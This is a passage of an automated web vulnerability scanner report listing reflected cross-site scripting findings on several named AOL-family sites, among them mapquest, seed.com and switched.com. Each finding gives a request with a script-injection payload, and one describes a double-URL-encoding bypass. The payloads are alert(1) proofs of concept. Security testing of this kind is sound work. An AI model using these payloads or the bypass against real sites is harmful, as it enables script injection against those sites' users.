Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /routeplanner?9a335"><script>alert(1)</script>1b481572ac=1 HTTP/1.1 Host: new.mapquest.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the _PACIFIC_COMMENTS cookie is copied into the XML document as plain text between tags. The payload 2b31a%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253e188ec506618 was submitted in the _PACIFIC_COMMENTS cookie. This input was echoed as 2b31a<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>188ec506618 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the _PACIFIC_COMMENTS cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
1.790. http://reference.aol.com/atlas [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
http://reference.aol.com
Path:
/atlas
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 706ce"><script>alert(1)</script>9a001f69067 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /atlas?706ce"><script>alert(1)</script>9a001f69067=1 HTTP/1.1 Host: reference.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.791. http://seed.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
http://seed.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 917ed"><script>alert(1)</script>7fb573477f6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /?917ed"><script>alert(1)</script>7fb573477f6=1 HTTP/1.1 Host: seed.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.792. http://switched.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
http://switched.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c7b1"><script>alert(1)</script>5847df33818 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /?4c7b1"><script>alert(1)</script>5847df33818=1 HTTP/1.1 Host: switched.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.793. http://www.downloadsquad.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.downloadsquad.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f04c0"><script>alert(1)</script>6faa9196b24 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /?f04c0"><script>alert(1)</script>6faa9196b24=1 HTTP/1.1 Host: www.downloadsquad.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.794. http://www.greendaily.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.greendaily.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1fe5"><script>alert(1)</script>216b045a0bc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /?d1fe5"><script>alert(1)</script>216b045a0bc=1 HTTP/1.1 Host: www.greendaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.795. http://www.holidash.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.holidash.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16818"><script>alert(1)</script>962d34918d3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /?16818"><script>alert(1)</script>962d34918d3=1 HTTP/1.1 Host: www.holidash.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.796. http://www.kol.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.kol.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa7e4"><script>alert(1)</script>afcc3115f86 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /?fa7e4"><script>alert(1)</script>afcc3115f86=1 HTTP/1.1 Host: www.kol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.797. http://www.massively.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.massively.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aff45"><script>alert(1)</script>4eeb20794a9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /?aff45"><script>alert(1)</script>4eeb20794a9=1 HTTP/1.1 Host: www.massively.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.798. http://www.new.mapquest.com/ [name of an arbitrarily supplied request parameter]previous
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.new.mapquest.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9cff0"><script>alert(1)</script>3cccc8372ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /?9cff0"><script>alert(1)</script>3cccc8372ba=1 HTTP/1.1 Host: www.new.mapquest.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 301 Moved Permanently Date: Sun, 06 Feb 2011 19:47:56 GMT Server: ArtBlast/3.5.5 MIME-Version: 1.0 Expires: Sun, 06 Feb 2011 20:17:56 GMT Content-length: 136 Content-type: text/html Location: http://www.mapquest.com/?9cff0"><script>alert(1)</script>3cccc8372ba=1